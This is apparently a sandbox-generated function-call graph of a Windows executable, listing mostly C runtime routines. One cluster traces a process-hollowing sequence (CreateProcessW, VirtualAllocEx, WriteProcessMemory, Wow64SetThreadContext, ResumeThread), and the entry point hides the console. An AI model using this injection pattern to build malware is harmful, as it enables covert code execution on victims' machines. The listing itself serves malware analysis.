20462->20465 20466 d419ff __strnicoll 29 API calls 20464->20466 20467 d42617 20465->20467 20468 d42605 20466->20468 20469 d419ff __strnicoll 29 API calls 20467->20469 20468->20456 20470 d42622 20469->20470 20470->20456 20472 d4c34a _Fputc 20471->20472 20475 d4c8df 20472->20475 20474 d4c356 _Fputc 20474->20470 20476 d4c8eb ___scrt_is_nonwritable_in_current_image 20475->20476 20477 d4c915 20476->20477 20478 d4c8f2 20476->20478 20486 d3d13f EnterCriticalSection 20477->20486 20480 d41ba8 __strnicoll 29 API calls 20478->20480 20481 d4c90b 20480->20481 20481->20474 20482 d4c923 20487 d4c73e 20482->20487 20484 d4c932 20500 d4c964 20484->20500 20486->20482 20488 d4c775 20487->20488 20489 d4c74d 20487->20489 20491 d48e44 _Ungetc 29 API calls 20488->20491 20490 d41ba8 __strnicoll 29 API calls 20489->20490 20499 d4c768 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20490->20499 20492 d4c77e 20491->20492 20493 d4c170 33 API calls 20492->20493 20494 d4c79c 20493->20494 20495 d4c828 20494->20495 20497 d4c83f 20494->20497 20494->20499 20496 d4c3c8 34 API calls 20495->20496 20496->20499 20498 d4c573 33 API calls 20497->20498 20497->20499 20498->20499 20499->20484 20503 d3d153 LeaveCriticalSection 20500->20503 20502 d4c96c 20502->20481 20503->20502 18393 d6019e 18397 d601d4 18393->18397 18394 d60321 GetPEB 18395 d60333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 18394->18395 18396 d603da WriteProcessMemory 18395->18396 18395->18397 18398 d6041f 18396->18398 18397->18394 18397->18395 18399 d60424 WriteProcessMemory 18398->18399 18400 d60461 WriteProcessMemory Wow64SetThreadContext ResumeThread 18398->18400 18399->18398 19288 d386a0 19289 d386bb 19288->19289 19291 d386cd 19289->19291 19292 d38091 19289->19292 19295 d43a8e 19292->19295 19296 d43a9a ___scrt_is_nonwritable_in_current_image 19295->19296 19297 d43aa1 19296->19297 19298 d43ab8 19296->19298 19299 d41314 __dosmaperr 14 API calls 19297->19299 19308 d3d13f EnterCriticalSection 19298->19308 19301 d43aa6 19299->19301 19303 d419ff __strnicoll 29 API calls 19301->19303 19302 d43ac7 19309 d43b0c 19302->19309 19305 d380a3 19303->19305 19305->19291 19306 d43ad5 19323 d43b04 19306->19323 19308->19302 19310 d43b22 19309->19310 19312 d43bac _Ungetc 19309->19312 19311 d43b50 19310->19311 19310->19312 19326 d4f40f 19310->19326 19311->19312 19314 d48e44 _Ungetc 29 API calls 19311->19314 19312->19306 19315 d43b62 19314->19315 19316 d48e44 _Ungetc 29 API calls 19315->19316 19322 d43b85 19315->19322 19317 d43b6e 19316->19317 19319 d48e44 _Ungetc 29 API calls 19317->19319 19317->19322 19320 d43b7a 19319->19320 19321 d48e44 _Ungetc 29 API calls 19320->19321 19321->19322 19322->19312 19331 d43bc2 19322->19331 19358 d3d153 LeaveCriticalSection 19323->19358 19325 d43b0a 19325->19305 19327 d469f4 __dosmaperr 14 API calls 19326->19327 19328 d4f42c 19327->19328 19329 d456b7 ___free_lconv_mon 14 API calls 19328->19329 19330 d4f436 19329->19330 19330->19311 19332 d48e44 _Ungetc 29 API calls 19331->19332 19333 d43be5 19332->19333 19334 d48e44 _Ungetc 29 API calls 19333->19334 19341 d43c0e 19333->19341 19335 d43bf3 19334->19335 19337 d48e44 _Ungetc 29 API calls 19335->19337 19335->19341 19338 d43c01 19337->19338 19340 d48e44 _Ungetc 29 API calls 19338->19340 19339 d43c48 19342 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 19339->19342 19340->19341 19341->19339 19344 d48b36 19341->19344 19343 d43cc6 19342->19343 19343->19312 19345 d48b49 _Fputc 19344->19345 19348 d48b70 19345->19348 19347 d48b5e _Fputc 19347->19339 19349 d48b85 19348->19349 19350 d48bc6 19349->19350 19351 d3d5c0 _Fputc 48 API calls 19349->19351 19356 d48b89 std::invalid_argument::invalid_argument _Fputc 19349->19356 19357 d48bb2 std::invalid_argument::invalid_argument 19349->19357 19353 d45801 _Fputc WideCharToMultiByte 19350->19353 19350->19356 19350->19357 19351->19350 19352 d41ba8 __strnicoll 29 API calls 19352->19356 19354 d48c81 19353->19354 19355 d48c97 GetLastError 19354->19355 19354->19356 19355->19356 19355->19357 19356->19347 19357->19352 19357->19356 19358->19325 20731 d387a0 20732 d387ac __EH_prolog3_GS 20731->20732 20735 d38818 20732->20735 20736 d387fe 20732->20736 20739 d387c6 20732->20739 20750 d4248a 20735->20750 20747 d3804d 20736->20747 20774 d39dbe 20739->20774 20741 d36840 std::ios_base::_Init 29 API calls 20741->20739 20742 d388d4 20742->20741 20743 d38837 20743->20742 20744 d4248a 45 API calls 20743->20744 20746 d3890e 20743->20746 20770 d37b8b 20743->20770 20744->20743 20746->20742 20777 d43927 20746->20777 20790 d42645 20747->20790 20751 d42496 ___scrt_is_nonwritable_in_current_image 20750->20751 20752 d424a0 20751->20752 20753 d424b8 20751->20753 20754 d41314 __dosmaperr 14 API calls 20752->20754 21053 d3d13f EnterCriticalSection 20753->21053 20756 d424a5 20754->20756 20758 d419ff __strnicoll 29 API calls 20756->20758 20757 d424c3 20759 d48e44 _Ungetc 29 API calls 20757->20759 20768 d424db 20757->20768 20769 d424b0 20758->20769 20759->20768 20760 d42543 20762 d41314 __dosmaperr 14 API calls 20760->20762 20761 d4256b 21054 d425a3 20761->21054 20764 d42548 20762->20764 20767 d419ff __strnicoll 29 API calls 20764->20767 20765 d42571 21064 d4259b 20765->21064 20767->20769 20768->20760 20768->20761 20769->20743 20771 d37bbf 20770->20771 20773 d37b9b 20770->20773 21068 d3902f 20771->21068 20773->20743 20775 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 20774->20775 20776 d39dc8 20775->20776 20776->20776 20778 d43933 ___scrt_is_nonwritable_in_current_image 20777->20778 20779 d4394f 20778->20779 20780 d4393a 20778->20780 21079 d3d13f EnterCriticalSection 20779->21079 20781 d41314 __dosmaperr 14 API calls 20780->20781 20783 d4393f 20781->20783 20785 d419ff __strnicoll 29 API calls 20783->20785 20784 d43959 21080 d4399a 20784->21080 20789 d4394a 20785->20789 20789->20746 20791 d42651 ___scrt_is_nonwritable_in_current_image 20790->20791 20792 d4266f 20791->20792 20793 d42658 20791->20793 20803 d3d13f EnterCriticalSection 20792->20803 20795 d41314 __dosmaperr 14 API calls 20793->20795 20797 d4265d 20795->20797 20796 d4267b 20804 d426bc 20796->20804 20798 d419ff __strnicoll 29 API calls 20797->20798 20800 d38058 20798->20800 20800->20739 20803->20796 20805 d4273f 20804->20805 20806 d426d9 20804->20806 20808 d42806 20805->20808 20811 d48e44 _Ungetc 29 API calls 20805->20811 20807 d48e44 _Ungetc 29 API calls 20806->20807 20809 d426df 20807->20809 20810 d42686 20808->20810 20859 d4de7e 20808->20859 20812 d42702 20809->20812 20815 d48e44 _Ungetc 29 API calls 20809->20815 20841 d426b4 20810->20841 20813 d42754 20811->20813 20812->20805 20826 d4271d 20812->20826 20816 d42777 20813->20816 20819 d48e44 _Ungetc 29 API calls 20813->20819 20818 d426eb 20815->20818 20816->20808 20817 d4278e 20816->20817 20820 d425df 43 API calls 20817->20820 20818->20812 20824 d48e44 _Ungetc 29 API calls 20818->20824 20821 d42760 20819->20821 20823 d42797 20820->20823 20821->20816 20825 d48e44 _Ungetc 29 API calls 20821->20825 20823->20810 20829 d3d2bf __Getctype 48 API calls 20823->20829 20827 d426f7 20824->20827 20828 d4276c 20825->20828 20826->20810 20844 d425df 20826->20844 20830 d48e44 _Ungetc 29 API calls 20827->20830 20831 d48e44 _Ungetc 29 API calls 20828->20831 20832 d427af 20829->20832 20830->20812 20831->20816 20834 d425df 43 API calls 20832->20834 20838 d427d9 20832->20838 20836 d427c0 20834->20836 20835 d427ed 20835->20810 20840 d41314 __dosmaperr 14 API calls 20835->20840 20837 d427c6 20836->20837 20836->20838 20839 d43927 31 API calls 20837->20839 20855 d48cda 20838->20855 20839->20810 20840->20810 21052 d3d153 LeaveCriticalSection 20841->21052 20843 d426ba 20843->20800 20845 d425a3 20844->20845 20846 d425c4 20845->20846 20847 d425af 20845->20847 20848 d425d3 20846->20848 20880 d4de73 20846->20880 20849 d41314 __dosmaperr 14 API calls 20847->20849 20848->20826 20851 d425b4 20849->20851 20853 d419ff __strnicoll 29 API calls 20851->20853 20854 d425bf 20853->20854 20854->20826 20856 d48ced _Fputc 20855->20856 21033 d48d11 20856->21033 20858 d48cff _Fputc 20858->20835 20860 d4e018 20859->20860 20861 d4e027 20860->20861 20866 d4e03c 20860->20866 20862 d41314 __dosmaperr 14 API calls 20861->20862 20864 d4e02c 20862->20864 20863 d4e037 20863->20810 20865 d419ff __strnicoll 29 API calls 20864->20865 20865->20863 20866->20863 20867 d4e09a 20866->20867 20868 d4f40f _Ungetc 14 API calls 20866->20868 20869 d48e44 _Ungetc 29 API calls 20867->20869 20868->20867 20870 d4e0ca 20869->20870 20871 d52d83 43 API calls 20870->20871 20872 d4e0d2 20871->20872 20872->20863 20873 d48e44 _Ungetc 29 API calls 20872->20873 20874 d4e10c 20873->20874 20874->20863 20875 d48e44 _Ungetc 29 API calls 20874->20875 20876 d4e11a 20875->20876 20876->20863 20877 d48e44 _Ungetc 29 API calls 20876->20877 20878 d4e128 20877->20878 20879 d48e44 _Ungetc 29 API calls 20878->20879 20879->20863 20881 d4de89 20880->20881 20882 d4de96 20881->20882 20885 d4deae 20881->20885 20883 d41314 __dosmaperr 14 API calls 20882->20883 20884 d4de9b 20883->20884 20886 d419ff __strnicoll 29 API calls 20884->20886 20887 d4df0d 20885->20887 20888 d4f40f _Ungetc 14 API calls 20885->20888 20895 d425d0 20885->20895 20886->20895 20889 d48e44 _Ungetc 29 API calls 20887->20889 20888->20887 20890 d4df26 20889->20890 20901 d52d83 20890->20901 20893 d48e44 _Ungetc 29 API calls 20894 d4df5f 20893->20894 20894->20895 20896 d48e44 _Ungetc 29 API calls 20894->20896 20895->20826 20897 d4df6d 20896->20897 20897->20895 20898 d48e44 _Ungetc 29 API calls 20897->20898 20899 d4df7b 20898->20899 20900 d48e44 _Ungetc 29 API calls 20899->20900 20900->20895 20902 d52d8f ___scrt_is_nonwritable_in_current_image 20901->20902 20903 d52d97 20902->20903 20906 d52db2 20902->20906 20904 d41327 __dosmaperr 14 API calls 20903->20904 20905 d52d9c 20904->20905 20908 d41314 __dosmaperr 14 API calls 20905->20908 20907 d52dc9 20906->20907 20910 d52e04 20906->20910 20909 d41327 __dosmaperr 14 API calls 20907->20909 20914 d4df2e 20908->20914 20911 d52dce 20909->20911 20912 d52e22 20910->20912 20913 d52e0d 20910->20913 20916 d41314 __dosmaperr 14 API calls 20911->20916 20931 d4d018 EnterCriticalSection 20912->20931 20917 d41327 __dosmaperr 14 API calls 20913->20917 20914->20893 20914->20895 20919 d52dd6 20916->20919 20920 d52e12 20917->20920 20918 d52e28 20921 d52e47 20918->20921 20922 d52e5c 20918->20922 20925 d419ff __strnicoll 29 API calls 20919->20925 20923 d41314 __dosmaperr 14 API calls 20920->20923 20924 d41314 __dosmaperr 14 API calls 20921->20924 20932 d52e9c 20922->20932 20923->20919 20927 d52e4c 20924->20927 20925->20914 20929 d41327 __dosmaperr 14 API calls 20927->20929 20928 d52e57 20995 d52e94 20928->20995 20929->20928 20931->20918 20933 d52ec6 20932->20933 20934 d52eae 20932->20934 20936 d53208 20933->20936 20941 d52f09 20933->20941 20935 d41327 __dosmaperr 14 API calls 20934->20935 20937 d52eb3 20935->20937 20938 d41327 __dosmaperr 14 API calls 20936->20938 20939 d41314 __dosmaperr 14 API calls 20937->20939 20940 d5320d 20938->20940 20943 d52ebb 20939->20943 20944 d41314 __dosmaperr 14 API calls 20940->20944 20942 d52f14 20941->20942 20941->20943 20949 d52f44 20941->20949 20945 d41327 __dosmaperr 14 API calls 20942->20945 20943->20928 20946 d52f21 20944->20946 20947 d52f19 20945->20947 20950 d419ff __strnicoll 29 API calls 20946->20950 20948 d41314 __dosmaperr 14 API calls 20947->20948 20948->20946 20951 d52f5d 20949->20951 20952 d52f98 20949->20952 20953 d52f6a 20949->20953 20950->20943 20951->20953 20985 d52f86 20951->20985 20955 d456f1 __strnicoll 15 API calls 20952->20955 20954 d41327 __dosmaperr 14 API calls 20953->20954 20956 d52f6f 20954->20956 20958 d52fa9 20955->20958 20959 d41314 __dosmaperr 14 API calls 20956->20959 20961 d456b7 ___free_lconv_mon 14 API calls 20958->20961 20962 d52f76 20959->20962 20960 d530e4 20964 d53158 20960->20964 20967 d530fd GetConsoleMode 20960->20967 20965 d52fb2 20961->20965 20963 d419ff __strnicoll 29 API calls 20962->20963 20994 d52f81 20963->20994 20966 d5315c ReadFile 20964->20966 20968 d456b7 ___free_lconv_mon 14 API calls 20965->20968 20969 d53174 20966->20969 20970 d531d0 GetLastError 20966->20970 20967->20964 20971 d5310e 20967->20971 20972 d52fb9 20968->20972 20969->20970 20975 d5314d 20969->20975 20973 d53134 20970->20973 20974 d531dd 20970->20974 20971->20966 20976 d53114 ReadConsoleW 20971->20976 20977 d52fc3 20972->20977 20978 d52fde 20972->20978 20986 d4133a __dosmaperr 14 API calls 20973->20986 20973->20994 20979 d41314 __dosmaperr 14 API calls 20974->20979 20990 d531b0 20975->20990 20991 d53199 20975->20991 20975->20994 20976->20975 20981 d5312e GetLastError 20976->20981 20983 d41314 __dosmaperr 14 API calls 20977->20983 20980 d4c112 31 API calls 20978->20980 20984 d531e2 20979->20984 20980->20985 20981->20973 20982 d456b7 ___free_lconv_mon 14 API calls 20982->20943 20987 d52fc8 20983->20987 20989 d41327 __dosmaperr 14 API calls 20984->20989 20998 d501bf 20985->20998 20986->20994 20988 d41327 __dosmaperr 14 API calls 20987->20988 20988->20994 20989->20994 20990->20994 21020 d53549 20990->21020 21007 d532a5 20991->21007 20994->20982 21032 d4d03b LeaveCriticalSection 20995->21032 20997 d52e9a 20997->20914 20999 d501cc 20998->20999 21000 d501d9 20998->21000 21001 d41314 __dosmaperr 14 API calls 20999->21001 21002 d501e5 21000->21002 21003 d41314 __dosmaperr 14 API calls 21000->21003 21005 d501d1 21001->21005 21002->20960 21004 d50206 21003->21004 21006 d419ff __strnicoll 29 API calls 21004->21006 21005->20960 21006->21005 21026 d533fc 21007->21026 21009 d4573f __strnicoll MultiByteToWideChar 21011 d533b9 21009->21011 21014 d533c2 GetLastError 21011->21014 21017 d532ed 21011->21017 21012 d53347 21018 d53301 21012->21018 21019 d4c112 31 API calls 21012->21019 21013 d53337 21015 d41314 __dosmaperr 14 API calls 21013->21015 21016 d4133a __dosmaperr 14 API calls 21014->21016 21015->21017 21016->21017 21017->20994 21018->21009 21019->21018 21021 d53583 21020->21021 21022 d53619 ReadFile 21021->21022 21023 d53614 21021->21023 21022->21023 21024 d53636 21022->21024 21023->20994 21024->21023 21025 d4c112 31 API calls 21024->21025 21025->21023 21027 d53430 21026->21027 21028 d534a1 ReadFile 21027->21028 21029 d532bc 21027->21029 21028->21029 21030 d534ba 21028->21030 21029->21012 21029->21013 21029->21017 21029->21018 21030->21029 21031 d4c112 31 API calls 21030->21031 21031->21029 21032->20997 21034 d48d25 21033->21034 21043 d48d35 21033->21043 21035 d48d5a 21034->21035 21038 d3d5c0 _Fputc 48 API calls 21034->21038 21034->21043 21036 d48d8e 21035->21036 21037 d48d6b 21035->21037 21040 d48db6 21036->21040 21041 d48e0a 21036->21041 21036->21043 21045 d51d02 21037->21045 21038->21035 21040->21043 21044 d4573f __strnicoll MultiByteToWideChar 21040->21044 21042 d4573f __strnicoll MultiByteToWideChar 21041->21042 21042->21043 21043->20858 21044->21043 21048 d53ea3 21045->21048 21051 d53ed1 _Fputc 21048->21051 21049 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 21050 d51d1d 21049->21050 21050->21043 21051->21049 21052->20843 21053->20757 21055 d425c4 21054->21055 21056 d425af 21054->21056 21057 d425d3 21055->21057 21059 d4de73 43 API calls 21055->21059 21058 d41314 __dosmaperr 14 API calls 21056->21058 21057->20765 21060 d425b4 21058->21060 21061 d425d0 21059->21061 21062 d419ff __strnicoll 29 API calls 21060->21062 21061->20765 21063 d425bf 21062->21063 21063->20765 21067 d3d153 LeaveCriticalSection 21064->21067 21066 d425a1 21066->20769 21067->21066 21069 d390e3 21068->21069 21070 d39053 21068->21070 21072 d357b0 std::ios_base::_Init 30 API calls 21069->21072 21071 d35850 std::ios_base::_Init 5 API calls 21070->21071 21073 d39065 21071->21073 21074 d390e8 21072->21074 21075 d32b20 std::ios_base::_Init 30 API calls 21073->21075 21076 d39070 _Yarn 21075->21076 21077 d390b1 _Yarn 21076->21077 21078 d32350 std::ios_base::_Init 29 API calls 21076->21078 21077->20773 21078->21077 21079->20784 21081 d439b2 21080->21081 21088 d43a22 21080->21088 21082 d48e44 _Ungetc 29 API calls 21081->21082 21084 d439b8 21082->21084 21083 d4f40f _Ungetc 14 API calls 21087 d43967 21083->21087 21085 d43a0a 21084->21085 21084->21088 21086 d41314 __dosmaperr 14 API calls 21085->21086 21089 d43a0f 21086->21089 21091 d43992 21087->21091 21088->21083 21088->21087 21090 d419ff __strnicoll 29 API calls 21089->21090 21090->21087 21094 d3d153 LeaveCriticalSection 21091->21094 21093 d43998 21093->20789 21094->21093 16678 d3a152 16679 d3a15e ___scrt_is_nonwritable_in_current_image 16678->16679 16704 d373ba 16679->16704 16681 d3a165 16682 d3a2be 16681->16682 16692 d3a18f ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 16681->16692 16744 d39a73 IsProcessorFeaturePresent 16682->16744 16684 d3a2c5 16724 d3f179 16684->16724 16689 d3a1ae 16690 d3a22f 16715 d416ec 16690->16715 16692->16689 16692->16690 16727 d3f1c3 16692->16727 16694 d3a235 16719 d320c0 GetModuleHandleA GetProcAddress FreeConsole 16694->16719 16699 d3a25a 16700 d3a263 16699->16700 16735 d3f1a5 16699->16735 16738 d373f3 16700->16738 16705 d373c3 16704->16705 16751 d396db IsProcessorFeaturePresent 16705->16751 16709 d373d4 16710 d373d8 16709->16710 16761 d3d0a0 16709->16761 16710->16681 16713 d373ef 16713->16681 16716 d416f5 16715->16716 16717 d416fa 16715->16717 16833 d41815 16716->16833 16717->16694 17764 d320b0 16719->17764 16722 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 16723 d32126 16722->16723 16733 d39a20 GetModuleHandleW 16723->16733 18175 d3f2c4 16724->18175 16728 d3f1d9 ___scrt_is_nonwritable_in_current_image std::_Lockit::_Lockit 16727->16728 16728->16690 16729 d4594a __Getctype 48 API calls 16728->16729 16732 d438fc 16729->16732 16730 d41f83 CallUnexpected 48 API calls 16731 d43926 16730->16731 16732->16730 16734 d39a2c 16733->16734 16734->16684 16734->16699 16736 d3f2c4 CallUnexpected 21 API calls 16735->16736 16737 d3f1b0 16736->16737 16737->16700 16739 d373ff 16738->16739 16741 d37415 16739->16741 18248 d3d0b2 16739->18248 16741->16689 16742 d3740d 16743 d3ab4e ___scrt_uninitialize_crt 7 API calls 16742->16743 16743->16741 16745 d39a89 std::invalid_argument::invalid_argument CallUnexpected 16744->16745 16746 d39b34 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16745->16746 16747 d39b78 CallUnexpected 16746->16747 16747->16684 16748 d3f18f 16749 d3f2c4 CallUnexpected 21 API calls 16748->16749 16750 d3a2d3 16749->16750 16752 d373cf 16751->16752 16753 d3ab2f 16752->16753 16770 d45386 16753->16770 16757 d3ab40 16758 d3ab4b 16757->16758 16784 d453c2 16757->16784 16758->16709 16760 d3ab38 16760->16709 16824 d47a29 16761->16824 16764 d3ab4e 16765 d3ab61 16764->16765 16766 d3ab57 16764->16766 16765->16710 16767 d44444 ___vcrt_uninitialize_ptd 6 API calls 16766->16767 16768 d3ab5c 16767->16768 16769 d453c2 ___vcrt_uninitialize_locks DeleteCriticalSection 16768->16769 16769->16765 16771 d4538f 16770->16771 16773 d453b8 16771->16773 16775 d3ab34 16771->16775 16788 d4f669 16771->16788 16774 d453c2 ___vcrt_uninitialize_locks DeleteCriticalSection 16773->16774 16774->16775 16775->16760 16776 d44411 16775->16776 16805 d4f57a 16776->16805 16779 d44426 16779->16757 16782 d44441 16782->16757 16785 d453ec 16784->16785 16786 d453cd 16784->16786 16785->16760 16787 d453d7 DeleteCriticalSection 16786->16787 16787->16785 16787->16787 16793 d4f6fb 16788->16793 16791 d4f6a1 InitializeCriticalSectionAndSpinCount 16792 d4f68c 16791->16792 16792->16771 16794 d4f71c 16793->16794 16795 d4f683 16793->16795 16794->16795 16796 d4f784 GetProcAddress 16794->16796 16798 d4f775 16794->16798 16800 d4f6b0 LoadLibraryExW 16794->16800 16795->16791 16795->16792 16796->16795 16798->16796 16799 d4f77d FreeLibrary 16798->16799 16799->16796 16801 d4f6c7 GetLastError 16800->16801 16802 d4f6f7 16800->16802 16801->16802 16803 d4f6d2 ___vcrt_FlsGetValue 16801->16803 16802->16794 16803->16802 16804 d4f6e8 LoadLibraryExW 16803->16804 16804->16794 16806 d4f6fb ___vcrt_FlsGetValue 5 API calls 16805->16806 16807 d4f594 16806->16807 16808 d4f5ad TlsAlloc 16807->16808 16809 d4441b 16807->16809 16809->16779 16810 d4f62b 16809->16810 16811 d4f6fb ___vcrt_FlsGetValue 5 API calls 16810->16811 16812 d4f645 16811->16812 16813 d4f660 TlsSetValue 16812->16813 16814 d44434 16812->16814 16813->16814 16814->16782 16815 d44444 16814->16815 16816 d44454 16815->16816 16817 d4444e 16815->16817 16816->16779 16819 d4f5b5 16817->16819 16820 d4f6fb ___vcrt_FlsGetValue 5 API calls 16819->16820 16821 d4f5cf 16820->16821 16822 d4f5e7 TlsFree 16821->16822 16823 d4f5db 16821->16823 16822->16823 16823->16816 16825 d47a39 16824->16825 16826 d373e1 16824->16826 16825->16826 16828 d47192 16825->16828 16826->16713 16826->16764 16829 d47199 16828->16829 16830 d471dc GetStdHandle 16829->16830 16831 d4723e 16829->16831 16832 d471ef GetFileType 16829->16832 16830->16829 16831->16825 16832->16829 16834 d41834 16833->16834 16835 d4181e 16833->16835 16834->16717 16835->16834 16839 d41756 16835->16839 16837 d4182b 16837->16834 16856 d41923 16837->16856 16840 d41762 16839->16840 16841 d4175f 16839->16841 16865 d47260 16840->16865 16841->16837 16846 d41773 16892 d456b7 16846->16892 16847 d4177f 16898 d41841 16847->16898 16852 d456b7 ___free_lconv_mon 14 API calls 16853 d417a3 16852->16853 16854 d456b7 ___free_lconv_mon 14 API calls 16853->16854 16855 d417a9 16854->16855 16855->16837 16857 d41994 16856->16857 16858 d41932 16856->16858 16857->16834 16858->16857 16859 d469f4 __dosmaperr 14 API calls 16858->16859 16860 d41998 16858->16860 16861 d45801 WideCharToMultiByte _Fputc 16858->16861 16864 d456b7 ___free_lconv_mon 14 API calls 16858->16864 17483 d4ca45 16858->17483 16859->16858 16862 d456b7 ___free_lconv_mon 14 API calls 16860->16862 16861->16858 16862->16857 16864->16858 16866 d41768 16865->16866 16867 d47269 16865->16867 16871 d4c96e GetEnvironmentStringsW 16866->16871 16920 d45a05 16867->16920 16872 d4c986 16871->16872 16873 d4176d 16871->16873 16874 d45801 _Fputc WideCharToMultiByte 16872->16874 16873->16846 16873->16847 16875 d4c9a3 16874->16875 16876 d4c9ad FreeEnvironmentStringsW 16875->16876 16877 d4c9b8 16875->16877 16876->16873 16878 d456f1 __strnicoll 15 API calls 16877->16878 16879 d4c9bf 16878->16879 16880 d4c9c7 16879->16880 16881 d4c9d8 16879->16881 16883 d456b7 ___free_lconv_mon 14 API calls 16880->16883 16882 d45801 _Fputc WideCharToMultiByte 16881->16882 16885 d4c9e8 16882->16885 16884 d4c9cc FreeEnvironmentStringsW 16883->16884 16884->16873 16886 d4c9f7 16885->16886 16887 d4c9ef 16885->16887 16889 d456b7 ___free_lconv_mon 14 API calls 16886->16889 16888 d456b7 ___free_lconv_mon 14 API calls 16887->16888 16890 d4c9f5 FreeEnvironmentStringsW 16888->16890 16889->16890 16890->16873 16893 d456c2 RtlFreeHeap 16892->16893 16894 d41779 16892->16894 16893->16894 16895 d456d7 GetLastError 16893->16895 16894->16837 16896 d456e4 __dosmaperr 16895->16896 16897 d41314 __dosmaperr 12 API calls 16896->16897 16897->16894 16899 d41856 16898->16899 16900 d469f4 __dosmaperr 14 API calls 16899->16900 16901 d4187d 16900->16901 16902 d41885 16901->16902 16913 d4188f 16901->16913 16903 d456b7 ___free_lconv_mon 14 API calls 16902->16903 16919 d41786 16903->16919 16904 d418ec 16905 d456b7 ___free_lconv_mon 14 API calls 16904->16905 16905->16919 16906 d469f4 __dosmaperr 14 API calls 16906->16913 16907 d418fb 17473 d417e6 16907->17473 16911 d456b7 ___free_lconv_mon 14 API calls 16915 d41908 16911->16915 16912 d41916 17479 d41a2c IsProcessorFeaturePresent 16912->17479 16913->16904 16913->16906 16913->16907 16913->16912 16916 d456b7 ___free_lconv_mon 14 API calls 16913->16916 17464 d4532c 16913->17464 16918 d456b7 ___free_lconv_mon 14 API calls 16915->16918 16916->16913 16917 d41922 16918->16919 16919->16852 16921 d45a10 16920->16921 16922 d45a16 16920->16922 16970 d46374 16921->16970 16927 d45a1c 16922->16927 16975 d463b3 16922->16975 16926 d45a34 16980 d469f4 16926->16980 16930 d45a21 16927->16930 16992 d41f83 16927->16992 16948 d47621 16930->16948 16933 d45a5d 16936 d463b3 __dosmaperr 6 API calls 16933->16936 16934 d45a48 16935 d463b3 __dosmaperr 6 API calls 16934->16935 16937 d45a54 16935->16937 16938 d45a69 16936->16938 16943 d456b7 ___free_lconv_mon 14 API calls 16937->16943 16939 d45a7c 16938->16939 16940 d45a6d 16938->16940 16987 d45c5c 16939->16987 16941 d463b3 __dosmaperr 6 API calls 16940->16941 16941->16937 16945 d45a5a 16943->16945 16945->16927 16946 d456b7 ___free_lconv_mon 14 API calls 16947 d45a8e 16946->16947 16947->16930 16949 d4764b 16948->16949 17285 d474ad 16949->17285 16954 d4767d 16956 d456b7 ___free_lconv_mon 14 API calls 16954->16956 16955 d4768b 17299 d472a8 16955->17299 16958 d47664 16956->16958 16958->16866 16960 d476c3 16961 d41314 __dosmaperr 14 API calls 16960->16961 16963 d476c8 16961->16963 16962 d4770a 16965 d47753 16962->16965 17310 d479dc 16962->17310 16966 d456b7 ___free_lconv_mon 14 API calls 16963->16966 16964 d476de 16964->16962 16967 d456b7 ___free_lconv_mon 14 API calls 16964->16967 16969 d456b7 ___free_lconv_mon 14 API calls 16965->16969 16966->16958 16967->16962 16969->16958 17001 d4670d 16970->17001 16973 d463ab TlsGetValue 16974 d46399 16974->16922 16976 d4670d std::_Lockit::_Lockit 5 API calls 16975->16976 16977 d463cf 16976->16977 16978 d463ed TlsSetValue 16977->16978 16979 d45a30 16977->16979 16979->16926 16979->16927 16985 d46a01 __dosmaperr 16980->16985 16981 d46a41 17019 d41314 16981->17019 16982 d46a2c HeapAlloc 16983 d45a40 16982->16983 16982->16985 16983->16933 16983->16934 16985->16981 16985->16982 17016 d3f4ab 16985->17016 17056 d45dc2 16987->17056 17158 d47ae0 16992->17158 16994 d41f9d IsProcessorFeaturePresent 16998 d41f88 16994->16998 16996 d3f18f CallUnexpected 21 API calls 16996->16998 16998->16992 16998->16994 16998->16996 17000 d4446c 16998->17000 17161 d47b07 16998->17161 17188 d41a60 16998->17188 17194 d4446d 16998->17194 17002 d4673d 17001->17002 17005 d46390 17001->17005 17002->17005 17008 d46642 17002->17008 17005->16973 17005->16974 17006 d46757 GetProcAddress 17006->17005 17007 d46767 std::_Lockit::_Lockit 17006->17007 17007->17005 17014 d46653 ___vcrt_FlsGetValue 17008->17014 17009 d466e9 17009->17005 17009->17006 17010 d46671 LoadLibraryExW 17011 d466f0 17010->17011 17012 d4668c GetLastError 17010->17012 17011->17009 17013 d46702 FreeLibrary 17011->17013 17012->17014 17013->17009 17014->17009 17014->17010 17015 d466bf LoadLibraryExW 17014->17015 17015->17011 17015->17014 17022 d3f4e6 17016->17022 17033 d45a9b GetLastError 17019->17033 17021 d41319 17021->16983 17023 d3f4f2 ___scrt_is_nonwritable_in_current_image 17022->17023 17028 d41d11 EnterCriticalSection 17023->17028 17025 d3f4fd CallUnexpected 17029 d3f534 17025->17029 17028->17025 17032 d41d28 LeaveCriticalSection 17029->17032 17031 d3f4b6 17031->16985 17032->17031 17034 d45ab1 17033->17034 17035 d45ab7 17033->17035 17036 d46374 __dosmaperr 6 API calls 17034->17036 17037 d463b3 __dosmaperr 6 API calls 17035->17037 17039 d45abb SetLastError 17035->17039 17036->17035 17038 d45ad3 17037->17038 17038->17039 17041 d469f4 __dosmaperr 12 API calls 17038->17041 17039->17021 17042 d45ae8 17041->17042 17043 d45af0 17042->17043 17044 d45b01 17042->17044 17045 d463b3 __dosmaperr 6 API calls 17043->17045 17046 d463b3 __dosmaperr 6 API calls 17044->17046 17047 d45afe 17045->17047 17048 d45b0d 17046->17048 17052 d456b7 ___free_lconv_mon 12 API calls 17047->17052 17049 d45b11 17048->17049 17050 d45b28 17048->17050 17051 d463b3 __dosmaperr 6 API calls 17049->17051 17053 d45c5c __dosmaperr 12 API calls 17050->17053 17051->17047 17052->17039 17054 d45b33 17053->17054 17055 d456b7 ___free_lconv_mon 12 API calls 17054->17055 17055->17039 17057 d45dce ___scrt_is_nonwritable_in_current_image 17056->17057 17070 d41d11 EnterCriticalSection 17057->17070 17059 d45dd8 17071 d45e08 17059->17071 17062 d45e14 17063 d45e20 